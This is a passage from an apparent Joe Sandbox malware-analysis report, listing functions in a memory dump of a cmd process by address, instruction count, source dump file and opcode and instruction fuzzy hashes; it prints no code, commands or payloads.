                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b126dc6ee795ad7a18ebf693b9625c9051bf982f6d427875f681d04d96b2d621
                                                                        • Instruction ID: 6ebb292550d2c056bb673351820a7de3050751974cdcfb0b827a3b652c969d82
                                                                        • Opcode Fuzzy Hash: b126dc6ee795ad7a18ebf693b9625c9051bf982f6d427875f681d04d96b2d621
                                                                        • Instruction Fuzzy Hash: AA51B470A042169FDB29DB64CC00BE8B7B5EF4D314F1882E9D529AB6D1D77899E1CF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03100BCD Relevance: .1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d71a74c090b5e4e3647124ac1102edfce268d704bfc8ace47dae03baee4e2828
                                                                        • Instruction ID: 36ac9f2d9da1a274f2e7250eb2feb561c1e6becba76abac24db7c19bec92afff
                                                                        • Opcode Fuzzy Hash: d71a74c090b5e4e3647124ac1102edfce268d704bfc8ace47dae03baee4e2828
                                                                        • Instruction Fuzzy Hash: D9416135E00228DBCB21DF68CD40BEAB7B8AF4D750F0500A5E908AB281D7749E85CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031C866E Relevance: .1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction ID: 798aa04fd448e6a8ade78eca5075dbbf292caf026083faea4e29074a75a99298
                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                        • Instruction Fuzzy Hash: 29418079B20299ABDB14DF99CCC5AAFF7BAAF9C600F18406DE804A7341D770DE018760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312A470 Relevance: .1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c5ec4af2e8e1c95e6b54d58518691c76a740ab1c7eab601fb85ba2aae78e36a
                                                                        • Instruction ID: 3b47d694b6c00a6e4e12e8fbcd645c8ce340da567ca4ea180af1071b22b9ed70
                                                                        • Opcode Fuzzy Hash: 2c5ec4af2e8e1c95e6b54d58518691c76a740ab1c7eab601fb85ba2aae78e36a
                                                                        • Instruction Fuzzy Hash: C4418F36A40224CFCB19DF68D9907AEBBB1FF0C310F1906A5D415AB295DF3499A1CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03108BF0 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50cb13ac5dc12d88bd6f633dbf4744ddac9c919365c6ec7b2863905b5d0f7a43
                                                                        • Instruction ID: 203b4bcdd6ec0bcde46256e6a97f1a0df0b70660e679adda50ba1652a7a86e99
                                                                        • Opcode Fuzzy Hash: 50cb13ac5dc12d88bd6f633dbf4744ddac9c919365c6ec7b2863905b5d0f7a43
                                                                        • Instruction Fuzzy Hash: F741E436905301DFC718EF5DC940AABB7B5FB8C704F158129D8155B295DBB5D882CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F8918 Relevance: .1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa6568f462558a238d6cda5ba64417738f21abccd30662578d27d5bd28ddfe95
                                                                        • Instruction ID: 502cc0438116142f5757065e1d49235884801fad20457ddc5cb5445cdda3a4d7
                                                                        • Opcode Fuzzy Hash: fa6568f462558a238d6cda5ba64417738f21abccd30662578d27d5bd28ddfe95
                                                                        • Instruction Fuzzy Hash: 0B418A3550D3169FD311DF65C880AABF6E9EF88B54F44492AFA90D7250E730DE148BA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FA020 Relevance: .1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction ID: f77fabfc049aafd9654cd417590164379995bb24264147f26c4c8a91352c126b
                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                        • Instruction Fuzzy Hash: A3411531B09211EFDB20DFA494407BEB7A1AB88724F19C06BBE59CB640D7358D808F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031009AD Relevance: .1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26692b13f09a4153d487e7c6e918e98f9ca9433e66cff6a3b72d96e052389bc1
                                                                        • Instruction ID: a225fdf654169ab2e8eeb21a0c22924621268c081b8f5cc90b2f76cf8eeaed6b
                                                                        • Opcode Fuzzy Hash: 26692b13f09a4153d487e7c6e918e98f9ca9433e66cff6a3b72d96e052389bc1
                                                                        • Instruction Fuzzy Hash: 57417871A00700EFD724DF18C840B66B7E9FF4D314F25896AE859DB290E7B1E982CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03130710 Relevance: .1, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction ID: 63f3eb114e6468c0d48670ddb0862b4a7b21db6047f427fd8b0402fd68361ed5
                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                        • Instruction Fuzzy Hash: B5411775A00705EFDB24CF99C990AAAB7F8FF0D700B1149ADE596EB650D330AA44CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310262C Relevance: .1, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d13768af9178cdc71f57ff6fd49731fd5e2b8dcacd61c2ea4b198dd2025e86a
                                                                        • Instruction ID: e9f4606a6cc3761f510eb1da1ac7f1483ff23cdefd810b94602606e9cf30e2d0
                                                                        • Opcode Fuzzy Hash: 9d13768af9178cdc71f57ff6fd49731fd5e2b8dcacd61c2ea4b198dd2025e86a
                                                                        • Instruction Fuzzy Hash: 0041D274901704DFCB25EF24C904B69B7B6FF4D310F158AA9D9169B2E0DB70A982CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031807C3 Relevance: .1, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1093694ad2d4334f522e12cddde279ce673c9dfeae19c74efa87c3ede57ab989
                                                                        • Instruction ID: 17e2cded84233ca01fbdd1b39454605813834d604ad66f91f6f35c3b7cfcab91
                                                                        • Opcode Fuzzy Hash: 1093694ad2d4334f522e12cddde279ce673c9dfeae19c74efa87c3ede57ab989
                                                                        • Instruction Fuzzy Hash: 2E416F72908344AFD320EF29C845B9BBBE8FF8D664F004A2EF598D7251D7709945CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F80A0 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdeb1993e18f1ad21b638a3c7d54a417fb39d8bccd8bc055374205a15a96c641
                                                                        • Instruction ID: 9702089e605a4172f50d950d28d6d498cac417e583716d9e1ce5c0b523dd1808
                                                                        • Opcode Fuzzy Hash: bdeb1993e18f1ad21b638a3c7d54a417fb39d8bccd8bc055374205a15a96c641
                                                                        • Instruction Fuzzy Hash: 4441E171A06615EFCB00EF18C8406ECB7B9BF48760F24C729E915ABA80DB34ED418B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031805A7 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e84441f85365b23a8e22ccbb0d2dac6e846c6712dce20a14b6fab1eabde37bb
                                                                        • Instruction ID: b804475f38729af16f510fd3d5d96c08129df012bf4dca24e60f8c7bb804f9fe
                                                                        • Opcode Fuzzy Hash: 7e84441f85365b23a8e22ccbb0d2dac6e846c6712dce20a14b6fab1eabde37bb
                                                                        • Instruction Fuzzy Hash: 0041A576505745AFC320EF68C840A6AB7A5EFCC700F18462DF8949B680E730D919CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F8B50 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b61b1a565599b9330decf3b67ea7e086200de93286ad415a75d09fe3e1afd860
                                                                        • Instruction ID: 0875fe3f384018756dfafe6b7f7b1a7fcd09f8f78f2a5bed5e2af6ae175e5a58
                                                                        • Opcode Fuzzy Hash: b61b1a565599b9330decf3b67ea7e086200de93286ad415a75d09fe3e1afd860
                                                                        • Instruction Fuzzy Hash: 9C416E75A02604DFCB14DF69C9809DDB7F1FF88324B24C66AD666AB6A0DB34A941CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031102E1 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction ID: 62258e328c4da60b6c4024ff2cf3305bf71535b882b430149e2a79d9c88e29f2
                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction Fuzzy Hash: 56312731A00644AFDB21CB69CC80BDABBE9BF0C350F0845B6E815DB391C77499D4CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031AE3DB Relevance: .1, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76547999d5a0001f07c59f0839f88c78c309a0df2caabd57b8430b68a77b6aa9
                                                                        • Instruction ID: 49a2da1f314c8b92f89c00e53f13575f0bc4e63eb6410358b2271ab2dcb92dfc
                                                                        • Opcode Fuzzy Hash: 76547999d5a0001f07c59f0839f88c78c309a0df2caabd57b8430b68a77b6aa9
                                                                        • Instruction Fuzzy Hash: 40317679741B15ABD722EF598C41FAB7AADEB4DB50F110028F600EF291DBA4DD11C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B4B4B Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3460eac0592d12dab33e3747324a332e07b5629be8a7505749c6c753a7217e2d
                                                                        • Instruction ID: 1638cefd01f192a18a347d6a138845b42bbef3622c391ca4c0c3ff662702eaff
                                                                        • Opcode Fuzzy Hash: 3460eac0592d12dab33e3747324a332e07b5629be8a7505749c6c753a7217e2d
                                                                        • Instruction Fuzzy Hash: DA31E7322052008FC324DF1AD980EA6B7F5FF88760F1A846DE9959B256DF30E841CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03104260 Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28e527e7e67ccc019e69dabc8105066ad22a37594ab53442385b32fb356a8e64
                                                                        • Instruction ID: 749156c4eca50d8b611728cb9f2ea7d9886128576586c751399e0be02eda3ad0
                                                                        • Opcode Fuzzy Hash: 28e527e7e67ccc019e69dabc8105066ad22a37594ab53442385b32fb356a8e64
                                                                        • Instruction Fuzzy Hash: 8541D135204B44DFC726CF65C480BD6BBE9AF4D714F05882DE69A8B290CBB0E854CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B4BB0 Relevance: .1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c18de4b24fa28c78ec5d12923840cc18d1ef7aa43e21918f0daec703b46e0e7d
                                                                        • Instruction ID: 23f576c2b978e6d0b5e1586f94224cbc4f64fde6089a81696440221fd641f6a9
                                                                        • Opcode Fuzzy Hash: c18de4b24fa28c78ec5d12923840cc18d1ef7aa43e21918f0daec703b46e0e7d
                                                                        • Instruction Fuzzy Hash: 0331A1716043018FD324DF2AC890AAAB3F5FB88B20F19856DF8959B252DB30EC44CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317EB1D Relevance: .1, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c583430376190877a18c539ddf676ea9d4af252f7617d39b2a75e1fef884cf6
                                                                        • Instruction ID: 89d3d310c5111764a9f6be086d8349ff01dee9c835d21358d94680c9b755c61f
                                                                        • Opcode Fuzzy Hash: 3c583430376190877a18c539ddf676ea9d4af252f7617d39b2a75e1fef884cf6
                                                                        • Instruction Fuzzy Hash: B431F7793027859BE726D768CD4CB55BBE9AB4DB44F2D04F0AA458F6D1DB28D840C230
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031C61C3 Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 24027852b227c5f0b8bb74b531efbd54136c30abb1daa5fb028bba84117d8845
                                                                        • Instruction ID: 7249ffe37f8be91e4c502b6d0ed2c54f8ce965ca4abd7fac3312244a186fa244
                                                                        • Opcode Fuzzy Hash: 24027852b227c5f0b8bb74b531efbd54136c30abb1daa5fb028bba84117d8845
                                                                        • Instruction Fuzzy Hash: 0731017AA10259ABDB14DF98CC40FAEF3B9EB4CB40F094169E800EB244D774ED01CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312EB20 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0713973bac0c943ca119023e1501738e982484394a6bc49cd3449833ac27c57b
                                                                        • Instruction ID: da63c630c0d36eb63960cac2af07f80d114d39a7cdc4ee3fc995d03dda7e40c9
                                                                        • Opcode Fuzzy Hash: 0713973bac0c943ca119023e1501738e982484394a6bc49cd3449833ac27c57b
                                                                        • Instruction Fuzzy Hash: 9A31B576E01224AFCB21DFA9CC40AAEBBB9EF4C750F114465F815D7250D3709E518BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031C60B8 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
